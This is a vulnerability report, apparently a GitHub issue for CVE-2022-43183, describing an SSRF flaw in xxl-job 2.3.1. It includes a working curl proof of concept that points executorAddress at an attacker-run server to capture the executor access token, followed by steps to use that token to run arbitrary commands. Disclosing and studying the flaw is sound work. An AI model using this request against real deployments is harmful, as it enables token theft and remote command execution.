Headline
CVE-2022-43183: xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands · Issue #3002 · xuxueli/xxl-job
XXL-Job before v2.3.1 contains a Server-Side Request Forgery (SSRF) via the component /admin/controller/JobLogController.java.
xxl-job =< 2.3.1 version (latest version) has SSRF vulnerability, which causes low-privileged users to control executor to execute arbitrary commands
- Vulnerability description
XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.3.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobLogController.java of Xxl-job 2.3.1, which originates from /logDetailCat, it directly sends a query log request to the address specified by executorAddress without judging whether the executorAddress parameter is the valid executor address. The query request will have the XXL-JOB-ACCESS- TOKEN, resulting in the leakage of XXL-JOB-ACCESS-TOKEN, and then the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.
The /logDetailCat interface call only needs to be a low Privilege user of the platform。
2.Affected version
Xxl-job-admin =< 2.3.1 (latest)
3.Proof of concept
1、build an http server locally and print the http request header log.
2、Create a normal user normal without any executor permissions。
3、When using the normal user to call the interface, set the input parameter executor Address to the http server address in step 1, and print the XXL-JOB-ACCESS-TOKEN directly on the target server
curl ‘http://localhost:8080/xxl-job-admin/joblog/logDetailCat’ \ -H ‘Accept: application/json, text/javascript, /; q=0.01’ \ -H ‘Accept-Language: zh-CN,zh;q=0.9’ \ -H ‘Connection: keep-alive’ \ -H ‘Content-Type: application/x-www-form-urlencoded; charset=UTF-8’ \ -H ‘Cookie: Idea-6a85f0b8=3349f800-77dc-4e25-a562-885457beb2aa; XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a226e6f726d616c222c2270617373776f7264223a223563373066666266643839303065626533643037326562346162353064376162222c22726f6c65223a302c227065726d697373696f6e223a22227d’ \ -H ‘Origin: http://localhost:8080’ \ -H ‘Referer: http://localhost:8080/xxl-job-admin/’ \ -H ‘Sec-Fetch-Dest: empty’ \ -H ‘Sec-Fetch-Mode: cors’ \ -H ‘Sec-Fetch-Site: same-origin’ \ -H ‘User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36’ \ -H ‘X-Requested-With: XMLHttpRequest’ \ -H ‘sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"’ \ -H ‘sec-ch-ua-mobile: ?0’ \ -H ‘sec-ch-ua-platform: "macOS"’ \ --data-raw ‘executorAddress=http://10.224.203.118&logId=0&fromLineNum=0&triggerTime=1586629003729’ \ --compressed
4、Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands
4、Recommendations
The same as in JobLogController.java, when matching the /joblog route, it will enter the index method to judge whether the 'executorAddress executor address belongs to the executor address.